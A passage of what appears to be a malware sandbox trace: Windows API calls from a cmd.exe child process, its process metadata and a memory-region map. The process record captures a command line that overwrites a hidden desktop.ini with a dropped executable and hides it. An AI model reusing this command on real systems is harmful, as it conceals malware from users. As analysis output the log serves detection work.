lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0214.074] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] GetFileType (hFile=0x4c) returned 0x1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] GetFileType (hFile=0x4c) returned 0x1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.075] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.075] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] GetFileType (hFile=0x4c) returned 0x1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] GetFileType (hFile=0x4c) returned 0x1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] GetFileType (hFile=0x4c) returned 0x1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] GetFileType (hFile=0x4c) returned 0x1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: 
lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.076] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.076] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0214.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] GetFileType (hFile=0x4c) returned 0x1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] GetFileType (hFile=0x4c) returned 0x1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] GetFileType (hFile=0x4c) returned 0x1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] GetFileType (hFile=0x4c) returned 0x1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0214.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] GetFileType (hFile=0x4c) returned 0x1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.077] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.077] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 
[0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.079] GetFileType (hFile=0x4c) returned 0x1 [0214.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.079] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0214.079] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.079] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x32, lpOverlapped=0x0) returned 1 [0214.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.079] GetFileType (hFile=0x4c) returned 0x1 [0214.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.079] GetFileType (hFile=0x4c) returned 0x1 [0214.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x32, lpOverlapped=0x0) returned 1 [0214.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.079] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.079] _close (_FileHandle=4) returned 0 [0214.080] FindNextFileW (in: hFindFile=0x3e0e78, lpFindFileData=0x2af35c | out: lpFindFileData=0x2af35c) returned 0 [0214.080] GetLastError () returned 0x12 [0214.080] FindClose (in: hFindFile=0x3e0e78 | out: hFindFile=0x3e0e78) returned 1 [0214.080] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0214.081] _close (_FileHandle=3) returned 0 [0214.081] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.081] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.081] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.081] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.081] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.082] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) 
returned 1 [0214.082] SetConsoleInputExeNameW () returned 0x1 [0214.082] GetConsoleOutputCP () returned 0x1b5 [0214.082] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.082] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.082] exit (_Code=0) Process: id = "530" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0xa74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31449 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31450 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31451 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31452 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type 
= private name = "private_0x0000000000150000" filename = "" Region: id = 31453 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31454 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31455 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31456 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31457 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 31458 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31555 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31556 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31557 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31558 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 31559 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000270000" filename = "" Region: id = 31560 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31561 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31562 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31563 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31564 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31565 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31566 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31567 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31568 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007f6f0000" filename = "" Region: id = 31569 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 31570 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31571 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31572 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31573 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31574 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31575 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31576 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 31577 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 31578 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 31603 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 
731 os_tid = 0x794 [0213.859] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fea4 | out: lpSystemTimeAsFileTime=0x24fea4*(dwLowDateTime=0xb4482280, dwHighDateTime=0x1d440a9)) [0213.859] GetCurrentProcessId () returned 0xa74 [0213.859] GetCurrentThreadId () returned 0x794 [0213.859] GetTickCount () returned 0x3bebc [0213.859] QueryPerformanceCounter (in: lpPerformanceCount=0x24fe9c | out: lpPerformanceCount=0x24fe9c*=27064871307) returned 1 [0213.860] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0213.861] __set_app_type (_Type=0x1) [0213.861] __p__fmode () returned 0x76b331f4 [0213.861] __p__commode () returned 0x76b331fc [0213.861] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0213.861] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0213.861] GetCurrentThreadId () returned 0x794 [0213.861] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x794) returned 0x38 [0213.861] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.861] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0213.861] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.862] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fe34 | out: phkResult=0x24fe34*=0x0) returned 0x2 [0213.862] VirtualQuery (in: lpAddress=0x24fe6b, lpBuffer=0x24fe04, dwLength=0x1c | out: lpBuffer=0x24fe04*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.862] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fe04, dwLength=0x1c | out: 
lpBuffer=0x24fe04*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0213.862] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fe04, dwLength=0x1c | out: lpBuffer=0x24fe04*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0213.862] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fe04, dwLength=0x1c | out: lpBuffer=0x24fe04*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.862] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fe04, dwLength=0x1c | out: lpBuffer=0x24fe04*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0213.862] GetConsoleOutputCP () returned 0x1b5 [0213.862] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.862] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0213.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.862] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0213.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.863] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.863] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.863] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.863] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.863] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.863] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0213.864] 